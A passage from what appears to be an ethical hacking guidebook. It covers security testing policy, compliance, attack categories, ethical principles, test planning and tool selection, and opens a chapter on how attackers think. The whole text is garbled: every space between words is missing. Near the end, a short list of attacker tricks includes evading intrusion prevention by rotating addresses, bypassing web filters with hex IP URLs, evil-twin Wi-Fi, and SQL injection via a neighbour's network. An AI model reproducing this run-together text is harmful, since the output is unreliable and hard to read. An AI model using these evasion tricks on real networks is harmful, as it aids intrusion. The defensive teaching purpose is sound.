Conversely,securityassessmentsbasedaroundethicalhackingfocusonvulnerabilitiesthatcanbeexploited.Thistestingapproachvalidatesthatsecuritycontrolsdonotexistorareineffectualatbest.Ethicalhackingcanbebothhighlytechnicalandnontechnical,andalthoughyoudouseaformalmethodology,ittendstobeabitlessstructuredthanformalauditing.Whereauditingisrequired(suchasfortheISO9001and27001certifications)inyourorganization,youmightconsiderintegratingtheethicalhackingtechniquesIoutlineinthisbookintoyourIT/securityauditprogram.Theycomplementoneanotherreallywell.

PolicyconsiderationsIfyouchoosetomakeethicalhackinganimportantpartofyourbusiness’sinformationriskmanagementprogram,youreallyneedtohaveadocumentedsecuritytestingpolicy.Suchapolicyoutlineswho’sdoingthetesting,thegeneraltypeoftestingthatisperformed,andhowoftenthetestingtakesplace.SpecificproceduresforcarryingoutyoursecuritytestscouldoutlinethemethodologiesIcoverinthisbook.Youmightalsoconsidercreatingasecuritystandardsdocumentthatoutlinesthespecificsecuritytestingtoolsthatareusedandspecificpeopleperformingthetesting.Youmightalsoliststandardtestingdates,suchasonceperquarterforexternalsystemsandbiannualtestsforinternalsystems—whateverworksforyourbusiness.

ComplianceandregulatoryconcernsYourowninternalpoliciesmightdictatehowmanagementviewssecuritytesting,butyoualsoneedtoconsiderthestate,federal,andinternationallawsandregulationsthataffectyourbusiness.Inparticular,theDigitalMillenniumCopyrightAct(DMCA)sendschillsdownthespinesoflegitimateresearchers.Seewww.eff.org/issues/dmcaforeverythingtheDMCAhastooffer.

ManyofthefederallawsandregulationsintheUnitedStates—suchastheHealthInsurancePortabilityandAccountabilityAct(HIPAA),HealthInformationTechnologyforEconomicandClinicalHealth(HITECH)Act,Gramm-Leach-BlileyAct(GLBA),NorthAmericanElectricReliabilityCorporation(NERC)CriticalInfrastructureProtection(CIP)requirements,andPCIDSS—requirestrongsecuritycontrolsandconsistentsecurityevaluations.RelatedinternationallawssuchastheCanadianPersonalInformationProtectionandElectronicDocumentsAct(PIPEDA),theEuropeanUnion’sDataProtectionDirective,andJapan’sPersonalInformationProtectionAct(JPIPA)arenodifferent.Incorporatingyoursecuritytestsintothesecompliancerequirementsisagreatwaytomeetthestateandfederalregulationsand

http://www.eff.org/issues/dmca

beefupyouroverallinformationsecurityandprivacyprogram.

UnderstandingtheNeedtoHackYourOwnSystems

Tocatchathief,youmustthinklikeathief.That’sthebasisforethicalhacking.Knowingyourenemyisabsolutelycritical.Thelawofaveragesworksagainstsecurity.Withtheincreasednumberofhackersandtheirexpandingknowledge,andthegrowingnumberofsystemvulnerabilitiesandotherunknowns,eventuallyallcomputersystemsandapplicationswillbehackedorcompromisedinsomeway.Protectingyoursystemsfromthebadguys—andnotjustthegenericvulnerabilitiesthateveryoneknowsabout—isabsolutelycritical.Whenyouknowhackertricks,youfindouthowvulnerableyoursystemsreallyare.

Hackingpreysonweaksecuritypracticesandundisclosedvulnerabilities.Moreandmoreresearch,suchastheannualVerizonDataBreachInvestigationsReport(www.verizonenterprise.com/DBIR),isshowingthatlong-standing,knownvulnerabilitiesarealsobeingtargeted.Firewalls,encryption,andpasswordscancreateafalsefeelingofsafety.Thesesecuritysystemsoftenfocusonhigh-levelvulnerabilities,suchasbasicaccesscontrol,withoutaffectinghowthebadguyswork.Attackingyourownsystemstodiscovervulnerabilities—especiallythelow-hangingfruitthatgetssomanypeopleintotrouble—helpsmakethemmoresecure.Ethicalhackingisaprovenmethodofgreatlyhardeningyoursystemsfromattack.Ifyoudon’tidentifyweaknesses,it’sonlyamatteroftimebeforethevulnerabilitiesareexploited.

Ashackersexpandtheirknowledge,soshouldyou.Youmustthinklikethemandworklikethemtoprotectyoursystemsfromthem.Astheethicalhacker,youmustknowtheactivitiesthathackerscarryoutandhowtostoptheirefforts.Knowingwhattolookforandhowtousethatinformationhelpsyoutothwarthackers’efforts.

Youdon’thavetoprotectyoursystemsfromeverything.Youcan’t.Theonlyprotectionagainsteverythingistounplugyourcomputersystemsandlockthemawaysonoonecantouchthem—notevenyou.Butdoingsoisnotthebestapproachtoinformationsecurity,andit’scertainlynotgoodforbusiness!What’simportantistoprotectyoursystemsfromknownvulnerabilitiesandcommonattacks,whichhappentobesomeofthemostoverlookedweaknessesinmostorganizations.

Anticipatingallthepossiblevulnerabilitiesyou’llhaveinyoursystemsandbusinessprocessesisimpossible.Youcertainlycan’tplanforalltypesofattacks—especiallytheunknownones.However,themorecombinationsyoutryandthemoreyoutestwholesystemsinsteadofindividualunits,thebetteryourchancesareofdiscoveringvulnerabilitiesthataffectyourinformationsystemsintheirentirety.

Don’ttakeyoursecuritytestingtoofar,though;hardeningyoursystemsfromunlikelyattacksmakeslittlesense.Forinstance,ifyoudon’thavealotoffoottrafficinyour

http://www.verizonenterprise.com/DBIR

officeandnointernalwebserverrunning,youmightnothaveasmuchtoworryaboutasacloudserviceprovidermighthave.

Youroverallgoalsforsecuritytestingareto

Prioritizeyoursystemssoyoucanfocusyoureffortsonwhatmatters.Hackyoursystemsinanondestructivefashion.Enumeratevulnerabilitiesand,ifnecessary,provetomanagementthatvulnerabilitiesexistandcanbeexploited.Applyresultstoremovethevulnerabilitiesandbettersecureyoursystems.

UnderstandingtheDangersYourSystemsFace

It’sonethingtoknowgenerallythatyoursystemsareunderfirefromhackersaroundtheworldandmalicioususersaroundtheoffice;it’sanothertounderstandthespecificattacksagainstyoursystemsthatarepossible.Thissectiondiscussessomewell-knownattacksbutisbynomeansacomprehensivelisting.

Manysecurityvulnerabilitiesaren’tcriticalbythemselves.However,exploitingseveralvulnerabilitiesatthesametimecantakeitstollonasystemornetworkenvironment.Forexample,adefaultWindowsOSconfiguration,aweakSQLServeradministratorpassword,oraserverhostedonawirelessnetworkmightnotbemajorsecurityconcernsbythemselves—butsomeoneexploitingallthreeofthesevulnerabilitiesatthesametimecouldleadtosensitiveinformationdisclosureandmore.

Complexityistheenemyofsecurity.

Thepossiblevulnerabilitiesandattackshavegrownenormouslyinrecentyearsbecauseofvirtualization,cloudcomputing,andevensocialmedia.ThesethreethingsalonehaveaddedimmeasurablecomplexitytoyourITenvironment.

NontechnicalattacksExploitsthatinvolvemanipulatingpeople—endusersandevenyourself—arethegreatestvulnerabilitywithinanycomputerornetworkinfrastructure.Humansaretrustingbynature,whichcanleadtosocialengineeringexploits.Socialengineeringistheexploitationofthetrustingnatureofhumanbeingstogaininformation—oftenviae-mailphishing—formaliciouspurposes.CheckoutChapter6formoreinformationaboutsocialengineeringandhowtoguardyoursystemsagainstit.

Othercommonandeffectiveattacksagainstinformationsystemsarephysical.Hackersbreakintobuildings,computerrooms,orotherareascontainingcriticalinformationorpropertytostealcomputers,servers,andothervaluableequipment.Physicalattackscanalsoincludedumpsterdiving—rummagingthroughtrashcansanddumpstersforintellectualproperty,passwords,networkdiagrams,andotherinformation.

NetworkinfrastructureattacksAttacksagainstnetworkinfrastructurescanbeeasytoaccomplishbecausemanynetworkscanbereachedfromanywhereintheworldviatheInternet.Someexamplesofnetworkinfrastructureattacksincludethefollowing:

Connectingtoanetworkthroughanunsecuredwirelessaccesspointattachedbehindafirewall

Exploitingweaknessesinnetworkprotocols,suchasTCP/IPandSecureSocketsLayer(SSL)Floodinganetworkwithtoomanyrequests,creatingadenialofservice(DoS)forlegitimaterequestsInstallinganetworkanalyzeronanetworksegmentandcapturingeverypacketthattravelsacrossit,revealingconfidentialinformationincleartext

OperatingsystemattacksHackinganoperatingsystem(OS)isapreferredmethodofthebadguys.OSattacksmakeupalargeportionofattackssimplybecauseeverycomputerhasanoperatingsystem,andOSesaresusceptibletomanywell-knownexploits,includingvulnerabilitiesthatremainunpatchedyearslater.

Occasionally,someoperatingsystemsthattendtobemoresecureoutofthebox—suchastheold-but-still-out-thereNovellNetWare,OpenBSD,andIBMSeriesi—areattacked,andvulnerabilitiesturnup.ButhackerstendtopreferattackingWindows,Linux,and,morerecently,MacOSX,becausethey’remorewidelyused.

Herearesomeexamplesofattacksonoperatingsystems:

ExploitingmissingpatchesAttackingbuilt-inauthenticationsystemsBreakingfilesystemsecurityCrackingpasswordsandweakencryptionimplementations

ApplicationandotherspecializedattacksApplicationstakealotofhitsbyhackers.Programs(suchase-mailserversoftwareandwebapplications)areoftenbeatendown.Forexample:

HypertextTransferProtocol(HTTP)andSimpleMailTransferProtocol(SMTP)applicationsarefrequentlyattackedbecausemostfirewallsandothersecuritymechanismsareconfiguredtoallowfullaccesstotheseservicestoandfromtheInternet,evenwhenrunningwithSSL(yuck!)orTransportLayerSecurity(TLS)encryption.Mobileappsfaceincreasingattacksgiventheirprevalenceinbusinesssettings.Unsecuredfilescontainingsensitiveinformationarescatteredacrossworkstationandservershares.Databasesystemsalsocontainnumerousvulnerabilitiesthatmalicioususerscanexploit.

ObeyingtheEthicalHackingPrinciplesSecurityprofessionalsmustcarryoutthesameattacksagainstcomputersystems,physicalcontrols,andpeoplethatmalicioushackersdo.(Iintroducethoseattacksintheprecedingsection.)Asecurityprofessional’sintent,however,istohighlightanyassociatedweaknesses.PartsIIthroughVofthisbookcoverhowyoumightproceedwiththeseattacksindetail,alongwithspecificcountermeasuresyoucanimplementagainstattacksagainstyourbusiness.

Toensurehisorhersecuritytestingisperformedadequatelyandprofessionally,everysecurityprofessionalmustabidebyafewbasictenets.Thefollowingsectionsintroducetheprinciplesyouneedtofollow.

Ifyoudon’theedthefollowingprinciples,badthingscanhappen.I’veseenthemignoredorforgottenwhenplanningorexecutingsecuritytests.Theresultsweren’tpositive—trustme.

WorkingethicallyThewordethicalinthiscontextmeansworkingwithhighprofessionalmoralsandvalues.Whetheryou’reperformingsecuritytestsagainstyourownsystemsorforsomeonewhohashiredyou,everythingyoudomustbeaboveboardinsupportofthecompany’sgoals.Nohiddenagendasallowed!Thisalsoincludesreportingallyourfindingsregardlessofwhetherornotitwillcreatepoliticalbacklash.

Trustworthinessistheultimatetenet.It’salsothebestwaytoget(andkeep)peopleonyoursideinsupportofyoursecurityprogram.Themisuseofinformationisabsolutelyforbidden.That’swhatthebadguysdo.Letthemreceiveafineorgotoprisonbecauseoftheirpoorchoices.Keepinmindthatyoucanbeethicalbutnottrustworthyandviceversa,alongthelinesofEdwardSnowden.

RespectingprivacyTreattheinformationyougatherwiththeutmostrespect.Allinformationyouobtainduringyourtesting—fromwebapplicationflawstocleartexte-mailpasswordstopersonallyidentifiableinformation(PII)andbeyond—mustbekeptprivate.Nothinggoodcancomeofsnoopingintoconfidentialcorporateinformationoremployees’privatelives.

Involveothersinyourprocess.Employawatch-the-watchersystemthatcanhelpbuildtrustandsupportforyoursecurityassessmentprojects.Documentationiskeysodocument,document,document!

NotcrashingyoursystemsOneofthebiggestmistakesI’veseenpeoplemakewhentryingtotesttheirownsystemsisinadvertentlycrashingthesystemsthey’retryingtokeeprunning.Itdoesn’thappenasmuchisitusedto,giventheresiliencyoftoday’ssystems.However,poorplanningandtimingcanhavenegativeconsequences.

Althoughit’snotlikely,youcancreateDoSconditionsonyoursystemswhentesting.Runningtoomanyteststooquicklycancausesystemlockups,datacorruption,reboots,andmore.Thisisespeciallytruewhentestingwebsitesandapplications.Ishouldknow:I’vedoneit!Don’trushandassumethatanetworkorspecifichostcanhandlethebeatingthatnetworktoolsandvulnerabilityscannerscandishout.

Youcanevenaccidentallycreateanaccountlockoutorasystemlockoutconditionbyusingvulnerabilityscannersorbysociallyengineeringsomeoneintochangingapassword,notrealizingtheconsequencesofyouractions.Proceedwithcautionandcommonsense.Eitherway,beityouorsomeoneelse,theseweaknessesstillexist,andit’sbetterthatyoudiscoverthemfirst!

Manyvulnerabilityscannerscancontrolhowmanytestsareperformedonasystematthesametime.Thesesettingsareespeciallyhandywhenyouneedtorunthetestsonproductionsystemsduringregularbusinesshours.Don’tbeafraidtothrottlebackyourscans.Itwilltakelongertocompleteyourtesting,butitcansaveyoualotofgrief.

UsingtheEthicalHackingProcessLikepracticallyanyITorsecurityproject,youneedtoplanyoursecuritytesting.It’sbeensaidthatactionwithoutplanningisattherootofeveryfailure.Strategicandtacticalissuesintheethicalhackingprocessneedtobedeterminedandagreedupon.Toensurethesuccessofyourefforts,spendtimeupfrontplanningforanyamountoftesting—fromasimpleOSpassword-crackingtestagainstafewserverstoanall-outvulnerabilityassessmentofawebenvironment.

Ifyouchoosetohirea“reformed”hackertoworkwithyouduringyourtestingortoobtainanindependentperspective,becareful.Icovertheprosandcons,andthedo’sanddon’tsassociatedwithhiringtrustedandno-so-trustedethicalhackingresourcesinChapter19.

FormulatingyourplanGettingapprovalforsecuritytestingisessential.Makesurethatwhatyou’redoingisknownandvisible—atleasttothedecisionmakers.Obtainingsponsorshipoftheprojectisthefirststep.Thisishowyourtestingobjectiveswillbedefined.Sponsorshipcouldcomefromyourmanager,anexecutive,yourclient,orevenyourselfifyou’retheboss.Youneedsomeonetobackyouupandsignoffonyourplan.Otherwise,yourtestingmightbecalledoffunexpectedlyifsomeone(includingthirdpartiessuchascloudserviceandhostingproviders)claimsyouwereneverauthorizedtoperformthetests.Evenworse,yougetfiredorchargedwithcriminalactivity—ithashappened!

Theauthorizationcanbeassimpleasaninternalmemoorane-mailfromyourbosswhenyouperformthesetestsonyourownsystems.Ifyou’retestingforaclient,haveasignedcontractstatingtheclient’ssupportandauthorization.Getwrittenapprovalonthissponsorshipassoonaspossibletoensurethatnoneofyourtimeoreffortiswasted.Thisdocumentationisyour“GetOutofJailFree”cardifanyonesuchasyourInternetServiceProvider(ISP),cloudserviceprovider,orrelatedvendorquestionswhatyou’redoing,orworse,iftheauthoritiescomecalling.Don’tlaugh—itwouldn’tbethefirsttimeithashappened.

Oneslipcancrashyoursystems—notnecessarilywhatanyonewants.Youneedadetailedplan,butthatdoesn’tmeanyouneedvolumesoftestingprocedurestomakethingsoverlycomplex.Awell-definedscopeincludesthefollowinginformation:

Specificsystemstobetested:Whenselectingsystemstotest,startwiththemostcriticalsystemsandprocessesortheonesyoususpectarethemostvulnerable.Forinstance,youcantestserverOSpasswords,testanInternet-facingwebapplication,orattemptsocialengineeringviae-mailphishingbeforedrillingdownintoallyoursystems.

Risksinvolved:Haveacontingencyplanforyourethicalhackingprocessincase

somethinggoesawry.Whatifyou’reassessingyourfirewallorwebapplicationandyoutakeitdown?Thiscancausesystemunavailability,whichcanreducesystemperformanceoremployeeproductivity.Evenworse,itmightcauselossofdataintegrity,lossofdataitself,andevenbadpublicity.It’llmostcertainlytickoffapersonortwoandmakeyoulookbad.

HandlesocialengineeringandDoSattackscarefully.Determinehowtheyaffectthepeopleandsystemsyoutest.

Datesthetestswillbeperformedandyouroveralltimeline:Determiningwhenthetestsareperformedissomethingyoumustthinklongandhardabout.Doyouperformtestsduringnormalbusinesshours?Howaboutlateatnightorearlyinthemorningsothatproductionsystemsaren’taffected?Involveotherstomakesuretheyapproveofyourtiming.

YoumaygetpushbackandsufferDoS-relatedconsequences,butthebestapproachisanunlimitedattack,whereanytypeoftestispossibleatanytimeofday.Thebadguysaren’tbreakingintoyoursystemswithinalimitedscope,sowhyshouldyou?SomeexceptionstothisapproachareperformingalloutDoSattacks,socialengineering,andphysicalsecuritytests.

Whetherornotyouintendtobedetected:Oneofyourgoalsmightbetoperformthetestswithoutbeingdetected.Forexample,youmightperformyourtestsonremotesystemsoronaremoteofficeandyoumightnotwanttheuserstobeawareofwhatyou’redoing.Otherwise,theusersorITstaffmightcatchontoyouandbeontheirbestbehavior—insteadoftheirnormalbehavior.

Knowledgeofthesystemsyouhavebeforeyoustarttesting:Youdon’tneedextensiveknowledgeofthesystemsyou’retesting—justabasicunderstanding.Thisbasicunderstandinghelpsprotectyouandthetestedsystems.

Understandingthesystemsyou’retestingshouldn’tbedifficultifyou’rehackingyourownin-housesystems.Ifyou’retestingaclient’ssystems,youmayhavetodigdeeper.Infact,I’veonlyhadoneortwoclientsaskforafullyblindassessment.MostITmanagersandothersresponsibleforsecurityarescaredoftheseassessments—andtheycantakemoretime,costmore,andbelesseffective.Basethetypeoftestyouperformonyourorganization’sorclient’sneeds.

Actionsyouwilltakewhenamajorvulnerabilityisdiscovered:Don’tstopafteryoufindoneortwosecurityholes.Keepgoingtoseewhatelseyoucandiscover.I’mnotsayingtokeephackinguntiltheendoftimeoruntilyoucrashallyoursystems;ain’tnobodygottimeforthat!Instead,simplypursuethepathyou’regoingdownuntilyoujustcan’thackitanylonger(punintended).Ifyouhaven’tfoundanyvulnerabilities,youhaven’tlookedhardenough.They’rethere.Ifyouuncoversomethingbig,youneedtosharethatinformationwiththekeyplayers(developers,DBAs,ITmanagers,andsoon)assoonaspossibletoplugthehole

beforeit’sexploited.Thespecificdeliverables:Thisincludesvulnerabilityscannerreportsandyourowndistilledreportoutliningtheimportantvulnerabilitiestoaddress,alongwithrecommendationsandcountermeasurestoimplement.

SelectingtoolsAswithanyproject,ifyoudon’thavetherighttoolsforyoursecuritytesting,youwillhavedifficultyaccomplishingthetaskeffectively.Havingsaidthat,justbecauseyouusetherighttoolsdoesn’tmeanthatyou’lldiscoveralltherightvulnerabilities.Experiencecounts.

Knowthelimitationsofyourtools.Manyvulnerabilityscannersgeneratefalsepositivesandnegatives(incorrectlyidentifyingvulnerabilities).Othersjustskiprightovervulnerabilitiesaltogether.Incertainsituations,likewhentestingwebapplications,you’llnodoubthavetorunmultiplevulnerabilityscannerstofindallofthevulnerabilities.

Manytoolsfocusonspecifictests,andnotoolcantestforeverything.Forthesamereasonthatyouwouldn’tdriveanailwithascrewdriver,don’tuseaportscannertouncoverspecificnetworkvulnerabilities.Thisiswhyyouneedasetofspecifictoolsforthetask.Themore(andbetter)toolsyouhave,theeasieryourethicalhackingeffortsare.

Makesureyou’reusingtherighttoolforthetask:

Tocrackpasswords,youneedcrackingtools,suchasOphcrackandProactivePasswordAuditor.Foranin-depthanalysisofawebapplication,awebvulnerabilityscanner(suchasNetsparker,AcunetixWebVulnerabilityScanner,orAppSpider)ismoreappropriatethananetworkanalyzer(suchasWiresharkorOmniPeek).

Whenselectingtherightsecuritytoolforthetask,askaround.GetadvicefromyourcolleaguesandfromotherpeopleonlineviaGoogle,LinkedIn,andTwitter.Hundreds,ifnotthousands,oftoolscanbeusedforyoursecuritytests.Thefollowinglistrunsdownsomeofmyfavoritecommercial,freeware,andopensourcesecuritytools:

Cain&AbelOmniPeekNexpose

NetsparkerElcomsoftProactiveSystemPasswordRecoveryMetasploitGFILanGuardCommViewforWiFi

IdiscussthesetoolsandmanyothersinPartsIIthroughVwhenIgointothespecifictests.TheAppendixcontainsamorecomprehensivelistingofthesetoolsforyourreference.

Thecapabilitiesofmanysecurityandhackingtoolsareoftenmisunderstood.Thismisunderstandinghascastanegativelightonotherwiseexcellentandlegitimatetools.Evengovernmentagenciesaroundtheworldaretalkingaboutmakingthemillegal!Partofthismisunderstandingisduetothecomplexityofmanysecuritytestingtools.Whichevertoolsyouuse,familiarizeyourselfwiththembeforeyoustartusingthem.Thatway,you’repreparedtousethetoolsinthewaysthey’reintendedtobeused.Herearewaystodothat:

Readthereadmeand/oronlineHelpfilesandFAQs.Studytheuserguides.Usethetoolsinalabortestenvironment.WatchtutorialvideosonYouTube(ifyoucanbearthepoorproductiononmostofthem).Considerformalclassroomtrainingfromthesecuritytoolvendororanotherthird-partytrainingprovider,ifavailable.

Lookforthesecharacteristicsintoolsforsecuritytesting:

AdequatedocumentationDetailedreportsonthediscoveredvulnerabilities,includinghowtheymightbeexploitedandfixedGeneralindustryacceptanceAvailabilityofupdatesandresponsivenessoftechnicalsupportHigh-levelreportsthatcanbepresentedtomanagersornontechnicaltypes(Thisisespeciallyimportantintoday’saudit-andcompliance-drivenworld!)

Thesefeaturescansaveyouatonoftimeandeffortwhenyou’reperformingyourtestsandwritingyourfinalreports.

ExecutingtheplanGoodsecuritytestingtakespersistence.Timeandpatienceareimportant.Also,be

carefulwhenyou’reperformingyourethicalhackingtests.Acriminalonyournetworkoraseeminglybenignemployeelookingoveryourshouldermightwatchwhat’sgoingonandusethisinformationagainstyouoryourbusiness.

Makingsurethatnohackersareonyoursystemsbeforeyoustartisn’tpractical.Besureyoukeepeverythingasquietandprivateaspossible.Thisisespeciallycriticalwhentransmittingandstoringyourtestresults.Ifpossible,encryptanye-mailsandfilescontainingsensitivetestinformationviaanencryptedZipfile,orcloud-basedfilesharingservice.

You’renowonareconnaissancemission.Harnessasmuchinformationaspossibleaboutyourorganizationandsystems,muchlikemalicioushackersdo.Startwithabroadviewandnarrowyourfocus:

1. SearchtheInternetforyourorganization’sname,yourcomputerandnetworksystemnames,andyourIPaddresses.

Googleisagreatplacetostart.

2. Narrowyourscope,targetingthespecificsystemsyou’retesting.

Whetheryou’reassessingphysicalsecuritystructuresorwebapplications,acasualassessmentcanturnupalotofinformationaboutyoursystems.

3. Furthernarrowyourfocuswithamorecriticaleye.Performactualscansandotherdetailedteststouncovervulnerabilitiesonyoursystems.

4. Performtheattacksandexploitanyvulnerabilitiesyoufindifthat’swhatyouchoosetodo.

CheckoutChapters4and5tofindoutmoreinformationandtipsonthisprocess.

EvaluatingresultsAssessyourresultstoseewhatyou’veuncovered,assumingthatthevulnerabilitieshaven’tbeenmadeobviousbeforenow.Thisiswhereknowledgecounts.Yourskillatevaluatingtheresultsandcorrelatingthespecificvulnerabilitiesdiscoveredwillgetbetterwithpractice.You’llendupknowingyoursystemsmuchbetterthananyoneelse.Thismakestheevaluationprocessmuchsimplermovingforward.

Submitaformalreporttomanagementortoyourclient,outliningyourresultsandanyrecommendationsyouneedtoshare.Keepthesepartiesinthelooptoshowthatyoureffortsandtheirmoneyarewellspent.Chapter17describestheethicalhackingreportingprocess.

MovingonWhenyoufinishyoursecuritytests,you(oryourclient)stillneedtoimplementyour

recommendationstomakesurethesystemsaresecure.Otherwise,allthetime,money,andeffortspentonethicalhackinggoestowaste.Sadly,Iseethisveryscenariofairlyoften.

Newsecurityvulnerabilitiescontinuallyappear.Informationsystemsconstantlychangeandbecomemorecomplex.Newsecurityvulnerabilitiesandexploitsareregularlyuncovered.Vulnerabilityscannersgetbetterandbetter.Securitytestsareasnapshotofthesecuritypostureofyoursystems.Atanytime,everythingcanchange,especiallyafterupgradingsoftware,addingcomputersystems,orapplyingpatches.Thisunderscorestheneedtoupdateyourtools,beforeeachuseifpossible.Plantotestregularlyandconsistently(forexample,onceamonth,onceaquarter,orbiannually).Chapter19coversmanagingsecuritychangesasyoumoveforward.

Chapter2

CrackingtheHackerMindsetInThisChapter

Understandingtheenemy

Profilinghackersandmalicioususers

Understandingwhyattackersdowhattheydo

Examininghowattackersgoabouttheirbusiness

Beforeyoustartassessingthesecurityofyoursystems,it’sgoodtoknowafewthingsaboutthepeopleyou’reupagainst.Manyinformationsecurityproductvendorsandotherprofessionalsclaimthatyoushouldprotectyoursystemsfromthebadguys—bothinternalandexternal.Butwhatdoesthismean?Howdoyouknowhowthesepeoplethinkandexecutetheirattacks?

Knowingwhathackersandmalicioususerswanthelpsyouunderstandhowtheywork.Understandinghowtheyworkhelpsyoutolookatyourinformationsystemsinawholenewway.Inthischapter,Idescribethechallengesyoufacefromthepeopleactuallydoingthemisdeedsaswellastheirmotivationsandmethods.Thisunderstandingbetterpreparesyouforyoursecuritytests.

WhatYou’reUpAgainstThankstosensationalisminthemedia,publicperceptionofhackerhastransformedfromharmlesstinkerertomaliciouscriminal.Nevertheless,hackersoftenstatethatthepublicmisunderstandsthem,whichismostlytrue.It’seasytoprejudgewhatyoudon’tunderstand.Unfortunately,manyhackerstereotypesarebasedonmisunderstandingratherthanfact,andthatmisunderstandingfuelsaconstantdebate.

Hackerscanbeclassifiedbyboththeirabilitiesandtheirunderlyingmotivations.Someareskilled,andtheirmotivationsarebenign;they’remerelyseekingmoreknowledge.Attheotherendofthespectrum,hackerswithmaliciousintentseeksomeformofpersonal,political,oreconomicgain.Unfortunately,thenegativeaspectsofhackingusuallyovershadowthepositiveaspectsandpromotethenegativestereotypes.

Historically,hackershackedforthepursuitofknowledgeandthethrillofthechallenge.Scriptkiddies(hackerwannabeswithlimitedskills)aside,traditionalhackersareadventurousandinnovativethinkersandarealwaysdevisingnewwaystoexploitcomputervulnerabilities.(Formoreonscriptkiddies,seethesection,“WhoBreaksintoComputerSystems,”laterinthischapter.)Hackersseewhatothersoftenoverlook.Theyhaveatremendousamountof“situationalawareness.”Theywonderwhatwouldhappenifacablewasunplugged,aswitchwasflipped,orlinesofcodewerechangedinaprogram.Theseold-schoolhackersarelikeTim“TheToolman”Taylor—TimAllen’scharacterontheclassicsitcomHomeImprovement—thinkingtheycanimproveelectronicandmechanicaldevicesby“rewiringthem.”

Whentheyweregrowingup,hackers’rivalsweremonstersandvillainsonvideogamescreens.Nowhackersseetheirelectronicfoesasonlythat—electronic.Hackerswhoperformmaliciousactsdon’treallythinkaboutthefactthathumanbeingsarebehindthefirewalls,wirelessnetworks,andwebapplicationsthey’reattacking.Theyignorethattheiractionsoftenaffectthosehumanbeingsinnegativeways,suchasjeopardizingtheirjobsecurityandputtingtheirpersonalsafetyatrisk.Government-backedhacking?Well,that’sadifferentstoryastheyaremakingcalculateddecisionstodothesethings.

Ontheflipside,oddsaregoodthatyouhaveatleastahandfulofemployees,contractors,interns,orconsultantswhointendtocompromisesensitiveinformationonyournetworkformaliciouspurposes.Thesepeopledon’thackinthewaypeoplenormallysuppose.Instead,theyrootaroundinfilesonservershares;delveintodatabasestheyknowtheyshouldn’tbein;andsometimessteal,modify,anddeletesensitiveinformationtowhichtheyhaveaccess.Thisbehaviorisoftenveryhardtodetect—especiallygiventhewidespreadbeliefbymanagementthatuserscanandshouldbetrustedtodotherightthings.Thisactivityisperpetuatediftheseuserspassedtheircriminalbackgroundandcreditchecksbeforetheywerehired.Pastbehaviorisoftenthebestpredictoroffuturebehavior,butjustbecausesomeonehasacleanrecordandauthorizationtoaccesssensitivesystemsdoesn’tmeanheorshewon’tdoanythingbad.Criminalbehaviorhastostartsomewhere!

Asnegativeasbreakingintocomputersystemsoftencanbe,hackersandresearchersplaykeyrolesintheadvancementoftechnology.Inaworldwithoutthesepeople,oddsaregoodthatthelatestintrusionpreventiontechnology,datalossprevention(DLP),orvulnerabilityscanningandexploittoolswouldlikelybedifferent,iftheyevenexistedatall.Suchaworldmaynotbebad,buttechnologydoeskeepsecurityprofessionalsemployedandkeepthefieldmovingforward.Unfortunately,thetechnicalsecuritysolutionscan’twardoffallmaliciousattacksandunauthorizedusebecausehackersand(sometimes)malicioususersareusuallyafewstepsaheadofthetechnologydesignedtoprotectagainsttheirwaywardactions.

Howeveryouviewthestereotypicalhackerormalicioususer,onethingiscertain:Somebodywillalwaystrytotakedownyourcomputersystemsandcompromiseinformationbypokingandproddingwhereheorsheshouldn’t,throughdenialofservice(DoS)attacksorbycreatingandlaunchingmalware.Youmusttaketheappropriatestepstoprotectyoursystemsagainstthiskindofintrusion.

ThinkinglikethebadguysMaliciousattackersoftenthinkandworklikethieves,kidnappers,andotherorganizedcriminalsyouhearaboutinthenewseveryday.Thesmartonesconstantlydevisewaystoflyundertheradarandexploiteventhesmallestweaknessesthatleadthemtotheirtarget.Thefollowingareexamplesofhowhackersandmalicioususersthinkandwork.Thislistisn’tintendedtohighlightspecificexploitsthatIcoverinthisbookorteststhatIrecommendyoucarryout,butrathertodemonstratethecontextandapproachofamaliciousmindset:

EvadinganintrusionpreventionsystembychangingtheirMACaddressorIPaddresseveryfewminutestogetfurtherintoanetworkwithoutbeingcompletelyblocked

Exploitingaphysicalsecurityweaknessbybeingawareofofficesthathavealreadybeencleanedbythecleaningcrewandareunoccupied(andthuseasytoaccesswithlittlechanceofgettingcaught),whichmightbemadeobviousby,forinstance,thefactthattheofficeblindsareopenedandthecurtainsarepulledshutintheearlymorning

Bypassingwebaccesscontrolsbychangingamalicioussite’sURLtoitsdotteddecimalIPaddressequivalentandthenconvertingittohexadecimalforuseinthewebbrowser

UsingunauthorizedsoftwarethatwouldotherwisebeblockedatthefirewallbychangingthedefaultTCPportthatitrunson

Settingupawireless“eviltwin”nearalocalWi-FihotspottoenticeunsuspectingInternetsurfersontoaroguenetworkwheretheirinformationcanbecapturedandeasilymanipulated

Usinganoverly-trustingcolleague’suserIDandpasswordtogainaccesstosensitiveinformationthatwouldotherwisebehighlyimprobabletoobtain

UnpluggingthepowercordorEthernetconnectiontoanetworkedsecuritycamerathatmonitorsaccesstothecomputerroomorothersensitiveareasandsubsequentlygainingunmonitorednetworkaccess

PerformingSQLinjectionorpasswordcrackingagainstawebsiteviaaneighbor’sunprotectedwirelessnetworkinordertohidethemalicioususer’sownidentity

Malicioushackersoperateincountlessways,andthislistpresentsonlyasmallnumberofthetechniqueshackersmayuse.ITandsecurityprofessionalsneedtothinkandworkthiswayinordertoreallydiginandfindsecurityvulnerabilitiesthatmaynototherwisebeuncovered.

WhoBreaksintoComputerSystemsComputerhackershavebeenaroundfordecades.SincetheInternetbecamewidelyusedinthe1990s,themainstreampublichasstartedtohearmoreandmoreabouthacking.Onlyafewhackers,suchasJohnDraper(alsoknownasCaptainCrunch)andKevinMitnick,arereallywellknown.Manymoreunknownhackersarelookingtomakeanameforthemselves.They’retheonesyouhavetolookoutfor.

Inaworldofblackandwhite,describingthetypicalhackeriseasy.Thehistoricalstereotypeofahackerisanantisocial,pimplyfaced,teenageboy.Buttheworldhasmanyshadesofgrayandmanytypesofpeopledoingthehacking.Hackersareuniqueindividuals,soanexactprofileishardtooutline.Thebestbroaddescriptionofhackersisthatallhackersaren’tequal.Eachhackerhashisorherownuniquemotives,methods,andskills.Hackerskilllevelsfallintothreegeneralcategories:

